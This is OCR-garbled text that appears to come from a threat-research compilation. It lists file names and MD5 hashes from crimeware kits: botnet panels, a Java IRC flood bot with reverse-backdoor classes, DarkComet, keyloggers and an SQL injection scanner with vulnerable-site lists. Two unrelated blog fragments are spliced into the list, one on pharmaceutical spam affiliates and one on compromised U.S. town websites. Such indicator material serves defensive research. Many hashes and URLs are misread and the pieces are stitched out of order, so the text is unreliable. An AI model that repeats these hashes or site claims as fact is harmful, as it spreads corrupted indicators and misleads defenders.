socks5server.obj 
09fa3c3ee233cb042bc06a351671ee2b 
softwaregrabber.obj 
e08a6f17f5416ca602c9435afa3f6e70 
tcpserver.obj 
d62b1f774002bda3ab991dbd0074dada 
userhook.obj 
d4bc8209af19b2b9113b846c9c6d1d69 
vnckeyboard.obj 
562a7561362f2d867dcabeb25d4aa85c 
vncmouse.obj 
b2254dca441ce87ab0e9118cfl1c6fc5 
vncpaint.obj 
48f785fdcf82dc47040a7d5bcc2bec2f 
vncserver.obj 
f80a21d8dae83001d17d6flbc759b3a4 
winapitables.obj 
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73bbbe9bdff2442e6a790a25fc9a2039 
windowstation.obj 
72531e269bc25413075f74850952bb59 
wininethook.obj 
55831837fe51fa78a0024ea5223b6eb9 
botnet _bots.Ing.en.php 
ec349a745ab7377e0b1cf2fde5070355 
botnet _bots.Ing.ru.php 
017c53fc1919794c21801f279f155406 
botnet _scripts.Ing.en.php 
f6f7dd4640db87d849fcae084cbef02f 
botnet _scripts.Ing.ru.php 
826920ee5df54d0dd6b991611b203380 
cp.php 
4f092a3993c30c0f152e9ce5e888a8bd 
fsarc.php 
5961441edf6éda9bd218f1d84c8a8422e 
global.php 
cc7aa716f091def7ba4ccc4114ba20e7 
index.php 
9f5a33bbc823619215ddd5db58dd70e7 
jabberclass.php 
d46ea7e0d9a60101c4d713c81bd6bf01 
Ing.en.php 
f0946e19307613b2e6e56e93bea22a63 
Ing.ru.php 
653f677acc91009d3128c8cb0bd4c43d 
reports db.Ing.en.php 
775df9bde4761bc29c19ea11e558d597 
reports _db.Ing.ru.php 
7f53a36e28d8c5cacca5d32935599b07 
reports _files.Ing.en.php 
aaaelf41d9d02df177c973a015b8ccca 
reports _files.Ing.ru.php 
35b9bdc91f40d8ade44fb9c84b3616d5 
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reports _jn.Ing.en.php 
4509dad4502d80dd4c65ef95ef74b715 
reports _jn.Ing.ru.php 
b4535923384a8a39ec9475db7f86bdb1 
reports _jn.php 
03cd43dd61b907d05cda58c69e08ee9f 
stats _main.Ing.en.php 
a15f315569ed8227d0855c62194fac63 
stats _main.Ing.ru.php 
67e3089776d058716213bee0cca6ed14 
stats main.php 
a83b4bf2ecbd81651b52c25b1c09d922 
stats _os.Ing.en.php 
2ba8b0a8548b40a42aa8cc6a4292Ff17b 
stats _os.Ing.ru.php 
961bdcb842a5ea58fe0659f480c90546 
stats _os.php 
7f5ela4dlaba26e790aalffc8905f7fe 
sys _info.Ing.en.php 
6bc3d4aaa2156laefdba7aefl43eleba 
sys _info.Ing.ru.php 
6e€3448b812e8316f40c23552fef568ad 
sys _info.php 
fc4a72637224a4a73d783090d018a942 
sys _options.Ing.en.php 
0e0calb2857f25066e04c583451e5456 
sys _options.Ing.ru.php 
d899f28afbb3c3e53145159f4e89509e 
sys _options.php 
93ee1f1c42fd015a4241c9a099122b5f 
sys _user.Ing.en.php 
€296c019b6ce0cdda9591827b3fbc805 
sys _user.Ing.ru.php 
c97b04fb8536046e89ef6dd97897ae3e 
sys _user.php 
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f40349a2af854ff6375fd7f9d671f32F 

sys _users.Ing.en.php 
8005ab6ea7ac69a90546d81b47750147 
sys _users.Ing.ru.php 
f591a9312b8a555485a9caac3d42c466 
sys _users.php 
01562d6f5f7c8dae83bb281705f4a526 
BackdoorClient.java 
79368ef72995f75e9b3166e6e564dbf4 


Bot.java 41101c700dea8de6c83bfceb1c5b758d 


BotUpdater.java 
bf2edd8alecae7fa33559d1303074be0 


CAC.java d2f0b174e6d716a56e46900b7cea3689 


Commandinterpreter.java 
5b1dc47bd0baf9080305317aacl17ee45 
Commands.java 
a4aaa3e1534e97c70d6b7574daa7fd78 
Compile A.bat 
31a23e878e255744da4a107263d3ceab 
Compile.bat 

49915801 bcef96d29ae7fa8983522757 
Config.java 
af8282b3ee4c682e49aa2db637cdba97 
config.php 
fd752131ec41fd103c61a18704a87f86 
ConfigDefaults.java 
29796a4088c5f817a9d066da34bbdebf 
ConfigReader.java 
41035966640239c8803b78f4e23c8ed3 
Constants.java 
07728a94c49390159a97835f00311efb 
Debug.java 
7986d239e01c6071e85ef36606886e41 
Download.java 
ea4456009ea808c6d463 9f4f1f53f5bc 
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ExternalSettings.java 
d18269f3db0aafc55508e7b0d55684f9 
FileCorrupt.java 
fe6daedb4ee1d82d06c040fc1d754db1 
FileRead.java 
9600814b76684b700c7d44ba530db088 
FileSearch.java 
6e1004c3c962eacf87d74ee0e6a73b28 
FileSend.java 
e94b4f15deecec3a0b80daal1163918c2 
FloodingStatus.java 
c3a2e3a0c21b1aca2257140a22198546 
HTTPFlood.java 
8e758ba2df85335806bc52c9d16c2f95 
IRC.java 01433f875495324630bb55963d8acaef 
IRCScript.java 
930f25da899eb93430b685583a748b8c 
IRCSocket.java 
af3e40d2e17f2e123e7a4bcedd88c6eb 
IRCSpammer.java 
e0bcb082cd341224aab255736cd8aeae 
jshrink.jar 
4e09f59a50374cd629fef1262f81eb9c 
jshrink.txt 

697b36b42db6a92cbc9627 7bfbc44992 
jusched.jar 
24f9ca7107915de4458cba0d6d0f4028 
keystore 9be708f077f2a672d9bbf21fd32bead8 
manifest.mf 
585e9f07a25935f6ed6a30a47538fb28 
MiscStatus.java 
f8de7e9f9b2fb937ec297655c2e02ac4 
OutStream.java 
d3196d30526fca472e0a3f34bc7ace67 
ReverseBackdoor.java 
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b98ffed98843742a2be1l5be89af6bclic 
Run.bat 
5a58aceb350addaee95382f72a43e801 
ServerStatus.java 
7f6a75fbf2d249c97ed71b3f7194dc3a 
Shell.java 
86c8ac2706aaeld8b094dc04e9389a80 
SocketFlood.java 
dd1bc8929753e3697ca322960fb5cles 
SpammingStatus.java 
9f8b2f581dd73ba73fc83cada364ddc7 
StartupAdder.java 
e607f55676f886b5clce38c4bO0ffaa72 
STDConfig.java 
4d314d11670e21dadb2798c07eae0dd3 
STDIRC.java 
d4a8a548f8634de1584c69e45d7f6bd5 
STDIRCSocket.java 
ff79e18146756f8340354ce3dc25e236 
Syn.java c4527a8clc2ad3defc9bcf993d0071d3 
SynCode.java 
63bd3ff37c636abe8ed51877a9f0a504 
SystemExec.java 
38131a88857a2343b18b9b1a7490a896 
UDPFlood.java 
f0ca9de3a12416434cf4bce585efd787 
URLChecker.java 
C623bb67f7638a912e34d7b905b4989d 
Util.java 
a749f9899faca6142e0928bd389f0cbc 
Zip.java 45054f46lacdc8e0a05cdd5456d573f6 
Banner.gif 
b5e46eb4581cb528564c658ba458d309 
Cam.png 
67764a424fcab7e4c8e6dd103b457d61 
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Client.jar 
0521c911e442cd9eec927d8439731a76 
index.gif 
eba3b0e253653ff3f4F0492096a49e9c 
index.html 
cec912f5b2c1be3ad887f6680b75297e 
index.png 
67764a424fcab7e4c8e6dd103b457d61 
java.jar 90e0ec88012a4e1ba0ff58a4533720d3 
load.gif eba3b0e253653ff3f4f0492096a49e9c 
Thumbs.db 
f62c410bbc898d8285b86c1bf04173c0 
filesonic.gif 
3d1d0f738a6edf39705653788acbe67a 
hotfiles.gif 
e6cb710b1515afeb9edec900499e977a 
logo (1).png 
b31cee276a94c2e55dea49de3bb6f8e96 
logo.png 860179fe590db8733e6a8245bb5698d2 
megaupload.gif 
a37736099fa6122ffel68c6fd9b27d87 
TurboBit.gif 
55b90b5d488084a2613af231babe721d 
uploaded.png 
98589b6fcb6a925fcaa9f271b28a8948F 
wuploado.gif 
9f8132acbf9ae7b2a2e009d86f9f513a 
MSWINSCK.OCX 
9484c04258830aa3c2f2a70eb041414c 
Web Ddos Attacker.exe 
dda887b93f7a9ca3e2fa52ab5ad2967c 
Be.Windows.Forms.HexBox.dll 
led5fe859aba26b4f8f0afc6341cd62f 
cecil LICENSE.txt 
350a4fe8061517098a67b315b2d43557 
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ChangeLog 
69d82553a2abcdc0274d1b0d7911a5ca 
credits.txt 
49287ee23dcb31940a73e755a64852b2 
ICSharpCode.NRefactory.dll 
e56dba60f855b1b1fe8c3dd0cc830ae3 
ICSharpCode.SharpDevelop.Dom.dll 
b194e825dd8d893f6af029cae90f31ad 
ICSharpCode. TextEditor.dll 
2f651edf3947661ed637630b1081ab92 
License _DotNetReflector. rtf 
58c218c11fd6020301463ff5ce080929 
log4net.dll 
5f3bd963f02108c36592b5728fa725c5 
log4net LICENSE.txt 
74ae3e8ad4267784fcal593fcbe3d091 
log4net NOTICE.txt 
00c0602e7bb66290e5d5848293d865b9 
MIT-LICENSE.txt 
865eccb377ff54b301f53860450b4f64 
Mono.Cecil.dll 
853046ad65ecaae62001c2bb08248919 
Mono.Cecil.Mdb.dll 
494f2c8878b2cf0ca3d1783397d2fldc 
Mono.Cecil.Pdb.dll 
dd286675bf8d977c501a9514edc75c51 
Net-Weave R.exe 
26e8cb237d43b4b4cal4eec2ed60f614 
README.FIRST.txt 
40de1a83a3ab42e64642ba96c3cl1lfcd2 
readme. rtf 
d02c126d72ec26d8e540dd1e5d863306 
RedGate.Reflector.Addin.dll 
856e34e165380077de54b27f3fdb04d4 
RedGate. Reflector. DevPathSetter.exe 
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f542a82e1a197679abd802e9ef539903 
Reflector.exe 
4b305b64e88ca85ad67eb6fe3dc8f80fe 
Reflector.exe.config 
b8b115a63c9368a5ff56f0bead67beb64 
ReflectorCmd.exe 
3e4da95ae0216052e064cfd9f068a792 
Reflexil.CecilStudio.dll 
414f470b37bde9ebc934cac8c5f7b014 
Reflexil.dll 
276670904e8d556d8992a76992feb4d3 
Reflexil.dll.config 

20a0849e85 lalefbfdefc2ad9fc0Oe63e 
Reflexil.Reflector.dll 
008a3f92b01ba098f1168acclea8b4d2 
System.Data.SQLite.dll 
80725a732aba27911402f9ca09fede23 
XPlugin.dll 
195eb26d43dd473543b2c943dce3f90a 
GeolP.dat 

d62b149e67 70f4db3e3f482bffb654a9 
NovaLite3.4.exe.uncracked 
2e¢2582937f30d863203cb400a7336bd 
Server.exe 
78dd76790299ea5f32625ecd8235bac9 
Settings. ini 
ff7266e18341acb68f6c627ba0033fab6 
ClearLooks-BLUE.skn 
6b5eede231fe2360e609fabac1b70935 
ClearLooks-HUMAN.skn 
09a4fded9fd322ecdddc6491ddf5b35f 
corona-CORONA.skn 
321544b69d1639d623a20063ce9ce484 
corona-CORONA12.skn 
bd91lac37eee2a3ef900f0dbe65b3b43b 
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It’s a public secret that Amazon.com’s success in terms of sustained profitability has to 
do with their affiliation based model, namely "let the others do the sale for you". Pharma- 
ceutical scammers have been anticipating this model for quite some now, a model where 
the pharma masters forward the processes of [1]collecting potential customers ([2]Jemails 
harvesting), contacting them and letting them know of how cheap their pharmaceutical are 
([3]spamming), enticing them to initiate a transaction with a fancy and professionally looking 
like site (freely available pharmacuitical web site templates) to those who become part of an 
affiliate network like the one you can see in the screenshot. 


Pharmaceutical scammers have their own fast-flux networks of constantly changing do- 
main and IP addresses, shared hosting of multiple scams in different segmets. Remember 
[4]meds247.org? It’s still up and running but the javascript obfuscation | reviewed before is 
now pointing to web server’s directory whose main index hosts a pOrn site - center4cares.com 
, SO you have a pOrn site that’s hosting viagra propositions - "insightful". Moreover, pharma- 
cuitical scam campaigns are also known to use free web space providers as doorway pages 
[5]in the form of redirectors. For instance, the most recent spamming campaign promoting 
a Canadian Pharmacy scam located at rxlovecaptain.com, is taking advantage of the already 
established trusted brand of Geocities to redirect the spammers users to the main page : 


geocities.com/MorganLogan82 


geocities.com/AishaDeleon78 


geocities.com/CarsonNguyen93 


If efficiency truly matters from a scammer’s perspective, we may soon witness actual DIY mar- 
keting packages with templates, "collection of potential customers", and a list of services to 
use when "contacting them". Now, if the pharma masters want to diversify as well, they can 
[6]vertically integrate by owning or renting the spamming services themselves, something | 
haven’t come across to - yet. 


. http: //ddanchev. blogspot .com/2007/01/inside-email-harvesters-configuration.htm 


_http://adanchev blogspot .con/2006/06 /enaii-span-harvesting- statistics. htnl 
_hetp://Adanchev blogspot. con/2007/05/nen~spanning-bot. nea 

| http: //adanchey blogspot. con/2007/10/love~is-psychedelic-too. bial 

. http://www. websense .com/securitylabs/blog/blog. php?BlogID=149 


6. http://en.wikipedia.org/wiki/Vertical_integratio 
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Crystal Clear-CRCL1S.skn 
4371487f2f2457013e169dcf9bed94ad 
DarkComet.skn 
85339e1c0d2347fa4966a7eac5b0745d 


demo.skn 7713de0797f23d8e471125c9eadfd361 


Extensis-COPPER.skn 

7be0261d187ae7 8ae2da82df89c93468 
Extensis-EXTENSIS.skn 
68e92268fa4b7131481bb887be8086dd 
GNOME-Blue.skn 
4f1f519eaf0a316c3b6dcdd97a3e21d1 
GNOME-Gray.skn 
935a3e670bef8aab5b9864ee9d68a3fe 
GNOME-Green.skn 
1b10432d4cOcb9ffd3fdd4cd0b18b0ad 
GUIRelax-CINDER.skn 
58be805b95bd508becb43face451d72b 
GUIRelax-SKYMAN.skn 
4e483ca5a87b3a489182b2137d4d4a3b 
GUIRelax-SUBTLE.skn 
00fc419f38bc8497f9d3e28d0136984d 
iTunes.skn 
7871441a52a0fe7b63fcea24e59837f3 
LE4-BLACKC.skn 
408a70f585fa2993292e66a7388f9ab0 
LE4-DEFAULT.skn 
704a599006212e90cc14aab79054f685 
Longhorn DWM-DWM.skn 
3cf957721e522fbdee43468b17f6ea57 
Longhorn Slate-Plex-SLATE.skn 
ac64b991cb1e2f00bb76207396fed90e 
Longhorn Style-BLUE.skn 
c965396d6d424b0604519795224ee105 
Luna (Longhorn Revolution)-BLUE.skn 
9454430c7eb51173b3596b2b4a6d588 
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Luna (Longhorn Revolution)-HOMESTEAD.skn 
b94c2b1cd9fb293cb168bfe3d22c340f 
Luna (Longhorn Revolution)-METALLIC.skn 
d5785da4aal1344cde14813df93ebb3dc 
Luna (Longhorn Revolution)-NEON.skn 
13779d0d3d007b635edce23f110ae904 
luna-BLUE.skn 
774d6a541bc4a88bcb4c169c9624de88 
luna-HOMESTEAD.skn 
fdd3979b4ac29b2f64da258c3b0a2399 
luna-METALLIC.skn 
851c715dd0dbb0413a7d90538141198a 
macos.skn 
9e5925399cbf958e3285df53c5225764 
MediaC-MEDIA1024.skn 
0a3e79ae6bal8e8366270270a2262d9d 
Mollis-BLUE.skn 
bfa788b65b5aabce7a005649d89a9fda 
MSN.skn 
87b457bb0a565901597aa87eae7c8b19 
mxp05.skn 
ef4cf84aba2b1a31ad15b84e47f3fa48 
mxp3.skn f4cf139b15ca7069ff5e9b0697d79070 
mxskin03.skn 
73069f2cd6e4b1ab18f973f1050858ed 
mxskin10.skn 
2¢5511cb1b9a331ee45567b9fd1b0fe6 
mxskin11.skn 
a9b7d22543d36b44e91f387233f4acb8 
mxskin13.skn 
a80603df3f9063f4a0972222b6ec485c 
mxskin14.skn 
34d47679086057beal1ff2a7087ed2550 
mxskin15.skn 


567e30c6efee36c81c2flb3da68e38ba 
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mxskin16.skn 
eb2fca3c3525edfb597cd81c8403af0d 
mxskin17.skn 
0a425bce490a9b356d9048b19e2b3a8e 
mxskin18.skn 
fd58d8e0e777b4d53f72d5ee5bcd3386 
mxskin19.skn 
fda67405727ac74d1f57afeal5ea6d30 
mxskin2.skn 
06f0917fbb236acb613bb5066625cffb 
mxskin20.skn 
6e6d4dfc12c67cadd014b8b31b32e313 
mxskin21.skn 
f42fdc9d40d367954a3c56456993d2e8 
mxskin22.skn 
1ale008b4df78238eb41246df2afe98b 
mxskin23.skn 
f511f42a37b45d8e0b96aalc0a2463cb 
mxskin24.skn 
e1d005b6be5435786f60250e7a36ee7f 
mxskin25.skn 
40e6e78885c18ced76f3cfd85b36e182 
mxskin26.skn 
2b9a363294f3d66b9f76b30f13e23de4 
mxskin27.skn 
d969fe8d8a5a4d543442e6654071aeb6e 
mxskin28.skn 
80ce17364a6b9c0bf36c904d 70245016 
mxskin29.skn 
labdf4551268cad16e70el1c33ac82fc6 
mxskin30.skn 
cee61b5333c13283a763e88d67 72454 
mxskin31.skn 
1649543fbab8c69b3c13752ae892ba94 


mxskin32.skn 


10975 


a858e589e9b4bde048eclebb9747e841 
mxskin33.skn 
c4a73fb88687b83d4cdfe5d401833176 
mxskin35.skn 
a90a2e430450fb5ee6330590434b539c 
mxskin36.skn 
50efecee54d04679b3817cdeb4f6d053 
mxskin37.skn 
cceea6cal299caa01ea83c813ea76f88 
mxskin38.skn 
cf2b82ec5d0385856bc7dacd21leea43b 
mxskin39.skn 
b3003d222a3ad39aa036d420a9ff05e7 
mxskin41.skn 
49b669ad0a18b807a5669bbc940a2a66 
mxskin42.skn 
8d36ad067a5b1f2d1b07b3fdbc9ca2d5 
mxskin43.skn 
1f424d3bc84ccbcc3d62587c377a2656 
mxskin44.skn 
ad3e7c09243680ca09cc9d3f5a339faa 
mxskin45.skn 
5b47f73f96b3ele5a0caf48e5b220c98 
mxskin46.skn 
2b8ee88a4b35ca7732c64a304ec9b5d5 
mxskin47.skn 
1b445f8b85069fc7aadc971b343069e9 
mxskin48.skn 
6c5f6314e9dd71a098b9df6bb995d108 
mxskin49.skn 
927dfc5aeed73d1a5f044e0296b2a35f 
mxskin50.skn 
90f39e32063cf0c53e3301054ef44123 
mxskin51.skn 
bee3434662960efdebe26fbb6adff91ec 
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mxskin53.skn 
7e65480a8e3d41286271a59bc5bcf680 
mxskin54.skn 
97266238e0a3e21da9a9e64fOd3edcb1 
mxskin55.skn 
12c3cfc2cdea5bdc7533b316b793e398 
mxskin56.skn 
c1802e4504bb468d6f755cdaldc9baa9 
mxskin57.skn 
77ad1fae656170bf9f8c04c60eb06044 
mxskin58.skn 
8df669fdcc550d9b5b5812d9e90e75fd 
mxskin59.skn 
db1c432364bc233a18168cc6f784ecb8 
mxskin61.skn 
cd5088a61e32541612f55c55f6la8ba3 
mxskin63.skn 
41e791423d77a7e939204c124a0dc9b1 
mxskin64.skn 
a8350d3c53dce2105c8415cee6d4783b 
mxskin65.skn 
7dee78c0408fb6b79a94b5668edede6b 
mxskin66.skn 
b53e6cc48828b8e5208c51c8b8574ce5 
mxskin68.skn 
ffad305a0e2473163639441e06f38cc4 
mxskin71.skn 
7ac0dd71bd0b10a0cba80911123103b9 
mxskin8.skn 
b450f19a18ed23c8cbb741c60c54d5e8 
mxskin9.skn 
18b1d7b6cdd339c54a932195a48c5d96 
Office 2007.skn 
ba4029be7069329be089b7d789eab64ad 
office2003.skn 
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07dclba635eee0edf8e721d22d08abc0 
ONatural-BLUE.skn 
ad28ad7ce71a2b380702adec9947a99F 
OpusOS-BLUEB2.skn 
73c5ee5eb79cb869c87ddf6a757d39d1 
OpusOS-DEEP2.skn 
7aaceea37b23b488130a0bcbb6c461f5 
OpusOS-OLIVE.skn 
a3adbe28186864478a01b5311b2e76a3 
Plex Style-PLEX.skn 
6a32c7eb12129eaa04205cfce2153200 
Plex Style-PLEXM6SVR.skn 
€57532550440d653b7d9a7aed67abaa9 
RoueGrey-SLIM.skn 
2de74dc3f87cb3d269c542312d9f0165 
RoueOlive-SLIM.skn 
a90981a2f900d65e8b3a7f7845a4ec6d 
RoueSteel-SLIM.skn 
a83f345b22f93e4375717fc5c4c159df 
Royale Glass-GRAPHITE.skn 
48ed4034e5353ec86ab20df53e9909c2 
Royale Glass-INDIGO.skn 
d39afd458a82d52889569cea78009188 
Royale-ROYALE.skn 
41bce8682b95799aa691414265368699 
Royale1-BLUE.skn 
b453c3eda9eb762742e0a86f67e8d8d0 
Royalel-HOMESTEAD.skn 
1f215201a27f22180eb614a254773105 
Royale1-METALLIC.skn 
lacc9b187b6ccfb16d5da02ffd3f65ab 
Samui-SAMUI.skn 
6f35be300f4c6fca962e87445ed6ef47 
Samui-SAMUI22.skn 
98d2adf7dc8b8b79e2793b964834cc2d 
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solaris99.skn 
19b941df687a06927a07f3f319add5ea 
Sustenance-BLUE.skn 
aca70ca4ba758d3a2f642ea208767cb1 
Sustenance-ERGO.skn 
b64002146b0d23c18e0e08e83cbf9be2 
Sustenance-METALLIC.skn 
b558466d934c9bd156055fcd69669392 
Sustenance-OLIVE.skn 
19b3d733dd444aa58fb0b339d86c09dd 
Sustenance-SLATE.skn 
22768b1c5ae9dae51de8e48f3e40874a 
System4-BLACK2.skn 
O3beeb19ccal6edae5ce406f93c7679e 
System4-BLUE.skn 
e0d87e0ae5c56ba46233258ba0a282d0 
TangoXP-BLUE.skn 
9d2ec6f14663b31090d5429f27a31945 
TangoXP-OLIVE.skn 
bb205f4ac4625f2983c6481ecd8bd777 
TD 4-PANTHER.skn 
17b09a53d88338fed602a0b5caladc89 
Tiger-WINDOWB.skn 
1fc372549cd168973dee52d97593a433 
Tiger-WINDOWG.skn 
ace285f6206f26c1f634b83f1ldf7bdO0f 
Tiger2-TGR.skn 
#7252903b0a4a75273274fb927d27f05 
Tiger2-TGRPS.skn 
€3a797905b33194024adbb7bd05c3f35 
VistaXP-VISTAXPB2.skn 
204d2da2cc459ce905cbd6b881eelasb 
VistaXP-VISTAXPS2.skn 
86bedd6c8b05b6d43ca76ledalc86dle 
Watercolor-BLUE.skn 
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0f1888d8cc51d125a3370e40ad84b1dc 
Win XP-Blue.skn 
6f63cabcle3c451773a8e73c9705bd11 
Win XP-Silver.skn 
39095bb9b5fcfa96529b14bebf5829ac 
wmpx-XMP2.skn 
92d6cdaa2a55b724eafe815dbdac07b1 
wmpx-XMPX3.skn 
0960ab16329c0f2e1207ab3f7925b03b 
Xplorer.skn 
c09540e44c9750cd28374a8bb2d6fcb2 
EvO _DBG.HLP 
909ceb8d61be31caa8099a7fb47e2eb9 
EvO _DBG.ini 
86b2d8c806d7c541b8369002d604aa63 
loaddll.exe 
31742efc0a95cd6b50b4014b5acc9b94 
ollydbg. ini 
86ee9322371d4422b9b1063b2b4a5dfd 
RAMHELP.DLL 
d5bd19d6dd351b6c43e78a4025015924 
A.ini 
f0effaf48aad7ed6d4e337aaaec08f62 
MFC42.Lib 
23dbc1c7e5d71e307b3caef5478fbaa5 
mfc71.Lib 
42bc9eea3acc3e9a4432d4b442d228d0 
HidDebug. ini 
9837fb806ff84410477f031b7b10379e 
HideDebugger.ini 
283ae02406abbdf7c89a7ad9197216ae 
PhantOm.txt 
2b23ff35b079cd3afc54109ca4e921fd 
SENuke.udd 
98edb6a6a7dc2e8eb5bc8b24bdb5bcca 
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Project Neptune v1.78.exe 
246eaf2b165343f6c10692ba0726e7f9 
settings.txt 

Default. ini 
6e€636b729b8666518d40b0e900e1c990 
Must Read Me.txt.txt 
b79eb3604e50b84398b5fc260895811b 


Cure.exe 26ceb33560ce7 7ff6245b22690dd172a 


Icons.txt 
d3b45a2ffad1813faa084cf985245917 
RapzoLogger _ Private Edition.url 
fd5f3f46b52053cb4b5635785c64190f 


RapZo Logger v 1.5 ( Public Edition ).exe 


c6bf2f41038354e622f9ecb5dba5c9aa 
RapzoLogger _ Private Edition.url 
fd5f3f46b52053cb4b5635785c64190f 
Codejock.CommandBars.v15.0.1.0cx 
ele66fdbf16c36875c3a617d7269189b 
Codejock.Controls.v15.0.1.0cx 
6a021b290d913525f2f7225462172690 
Codejock.SkinFramework.v15.0.1.0cx 
6e0ce4623cffd9abe988bd57a7d5e468 
comctl32.oca 
be33680428f4ea566940bc1b6ad302fb 
comctl32.o0cx 
eb5f811c1f78005b3c147599a0cccf51 
Comdlg32.0ca 
e4cc556aa9eeafe323147ccc5d3c15a4 
Comdlg32.0cx 
d76f0eab36f83a31d411laeaf70da7396 
CoolXPButton.oca 
1a135leddc6a07dfd639a30bb13ee661 
CoolXPButton.ocx 
5ea96693f648cbd37a4a2c1b90c7f420 
CoolXPCheck.oca 
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7f1a2792e7e4731b65551353bf17e76fd 
CoolXPCheck.ocx 
fa526e1dd2c13261bd3ebdf93b744e95 
CoolXPText.oca 
e2e925a57d1e912bec96fd753792d0cf 
CoolXPText.ocx 
dbb7aal3becb1f45604f4c06965046bf 
MSINET.oca 
9ecbb7c9fa0b736d4409a993 9ffb62dd 
MSINET.OCX 
7bec181a21753498b6bd001c42a42722 
reg.bat 
1870c0877f8d583330faa4bc4520fff1 
Registrator.exe 
0a107bbf138aaac2daeac73cb56f1e00 
Required OCX.txt 
015ee77d71dd7flbf416c0659dcafd91 
cMd aL - ddoser.exe 
5dbd0ee777d1c96194192c9bd3dd5fa3 
DarkFantasy Pega IP.exe 
1927d5cc840c0d57783945e0b25c220d 
Multiple CmSSite FlooDDoS.txt 
b593e61c96beda6b419c33d3193e04a4 
Readme.chm 
c9b2db0c6afe137f15c8fe534505a285 
Sprut.exe 
€9122f417470b8a217c1ff96b9ce0d08 
sprut.ini 
d998dd4cf4613517630ca63f5a88891c 
1.txt 
e0ae3e537161824ad457c15bcd281f5d 
3MA _processingbar.gif 
80cb7e9488e8cb6d80f9049d51b90512 
AD.bmp 
783266fle6ad9fe366d7cdf75ec8669d 
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3.10.8 Compromised Sites Serving Malware and Spam (2007-10-10 15:28) 


Welcome to Chetek 


(Chetek irvtiee yor f aryoy the bevary a! cur iehas 


and he meaty year-round mecmstonel sctyhes 
We otter musty Crciicine and @wevete in and ancynd 
Ow Cy I> heap you setanuead roughaut the 
CNS 
Darks 3 pecmcs tecknes - public beech 
(OCIS AN QUt ERRES  armQUe shODS 
PY (ekots motets» camegrounds 
export got courses | reediou Galines 
sottal fekis museum community center fer 
sernys | inary horee arena - vnchatnal path 
Click to ene 9 map of Chetes that anaidennee TE daatet 
Cty Mall Contact intorreaton 

== reek Op Mat 

Se 220 Shout Sires, PO Bax 104 


eed Chetek, WE 54728 


Hours Moraay Poday 800 am 400 9m 


Wish it was the average .cn domain I’m referring to, in this case it’s the web sites of 
three U.S towns, namely the City of Chetek, Winsonsin, the City of Somerset, Texas and 
Town of Norwood, Massachusetts, who are [1]the latest victims of [2]embedded malware and 
[3]blackhat SEO injected within their juicy from a blackhat SEO perspective .gov tld extensions. 


Apparently, malicious parties managed to compromise City of Chetek’s official site and created 
several subdomains with URLs consisting of soam redirecting to the downloader’s page : 


st-3.x.cityofchetek-wi.gov/porn/st3/502.html 


st-3.x.cityofchetek-wi.gov/porn/st3/537.html 
st-2.x.cityofchetek-wi.gov/porn/st2/322.html 
2k.x.cityofchetek-wi.gov/porn/2k-003/1618.html 


1101 


ajax-loader 2.gif 
d2bd9f3ec461b63bf2falf2b29b94167 
ajax-loader 3.gif 
90e912bd3615a05694794e2d456fcacc 
ajax-loader.gif 
90f2f3f52c47d7694cde1742f9a3c68d 
arrow. gif 
f42e€6552323bb2abceb067697ecd772e 
Asp.txt 
8adf14a2d45203941b90a70db95ab862 


bone.obmp 4b036ff3d8cc49d26e37d975b3bfe802 


bone2.gif 
626689992ce56fcbfbd6f000cf99e978 
BROWSE. gif 
0d3a894b7b00a48996f702d71fe7e7c3 
BROWSE2.gif 
d2bd9f3ec461b63bf2falf2b29b94167 
checked.bmp 
e€183d7f4c2109c03927abd3a850a8a39 
close.bmp 
8aed3bf449dc4f0ea8872c98724b7f60 
close2.bmp 
0487ee64e34d9376ded8c6580a8089ab 
connect.bmp 
0b6643d83e8ca81e2215ed486776cf37 
connected.bmp 
88b928918483f5e120e000009e15a80c 
connect _to.bmp 
e2c89a72af692c8d3b57ed2b44c7ebla 
connect _to2.bmp 
851fec495a139739c2b696a1b712a932 
country _codes.txt 
c2edf77bed03ddecb84375ffbo3623b2d 
crawl.gif 
319192c411580645b328865163c9dee3 
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crawl.png 
fc62a57a9d14e7b2d685335eef5d4546 
database.bmp 
dd3e7fbc5a6f32197fd7ac140b5dd62a 
db.bmp 
8880f63701214a068d564a9f72c55bf1 
disconnect.bmp 
b65f25cb55e9d34cbb6ce4ea9d7efbcb 
error-responses.txt 
3301e74a747c481176344255fb05b5c8 
export.bmp 
ac3608158aadfadcfc5a6a33eae36416 
export.gif 
287ab97bef3f760f7a6a0283d9a4f967 
highlight. gif 

icon.ico 
d3alad372af30ba5468a7dd1789b06ad 
LFI.txt 
a63al1al1a541f9899ee199f7a766c7793 
listdb.obmp 
6627f6250d13f5a01097e49774ad157c 
LOL.txt 
4b8efc2f1d2084381b737a5bb4956c1d 
mdf.txt 
5ad17da324d72bf2b3f31d95b3c69301 
not _connected.bmp 
8e31628f094b0968b4768f5b700f9101 
Php.txt 
0612ff7824881786fa64dc374581d9b0 
print.bmp 
8e0447b0567f2755fffe9fd71e7cc16c 
RFI.txt 
b072bbc682fa48d8c043022dc8cca5b0 
scan.gif 983e47ae2b25ba7d70da3f84adb88dd2 
search.bmp 
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e0ad941flbc5ba506f7b0f3e4b50c7bd 
search2.bmp 
1ec16f1d608d55b039d4fabb2b23dc7c 


skin.omp 67d00b7f28e0bfe0fc144711f387ffa6 


skin2.bmp 
fdeflc90bbfd8dc13e653368b7347a18 
skin3.bmp 
b7eb7d86e5be504d7c22f4fc7eb20200 
skull.bmp 
52120866b1613a61a76a931be537646f 
some __sqli_sites.txt 
83218bf786eb9680b268bd1f1314eea3 
source.html 
83d7aclaacead8da930e97aa78b24186 
sql poison.bmp 
583342321b0482529e376415e87b98d4 
Sql Poizon - The Exploit Scanner.exe 
bfcb8c5408fe750e431f2e843b8b85b8 
Sql Poizon - The Exploit Scanner.pdb 
164457674d31f953c7ebe9f4c3a90dcb 
Sql Poizon - The Exploit Scanner.vshost.exe 
d9086aab959707dd1a8643f3df70db9d 
sql-vulnerable-sites-0.txt 
00c30055789d994315feaaf9d92b16ec 
sql-vulnerable-sites-1.txt 
a8276e0f0f6c56f59b3945da95769d8e 
sql-vulnerable-sites-10.txt 
83218bf786eb9680b268bd1f1314eea3 
sql-vulnerable-sites-11.txt 
bdefc37ce4da1489ab0e2fa5769610db 
sql-vulnerable-sites-12.txt 
58e0dee7f2365a7dd6e70cfaeecce9e5 
sql-vulnerable-sites-2.txt 
a5f6ade181944105805c3c4ea29b448b 


sql-vulnerable-sites-3.txt 
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b2fdc80b2142873d0f0a2b57dc1b831e 
sql-vulnerable-sites-4.txt 
e514cd3e851f8d97d97f66e3a0fdf481 
sql-vulnerable-sites-5.txt 
